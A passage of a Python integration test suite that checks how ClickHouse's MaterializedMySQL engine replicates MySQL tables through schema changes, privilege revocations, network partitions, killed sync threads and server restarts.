"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL for flush data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
# When ClickHouse dump all history data we can query it on ClickHouse
# but it don't mean that the sync thread is already to connect to MySQL.
# So After ClickHouse can query data, insert some rows to MySQL. Use this to re-check sync successed.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
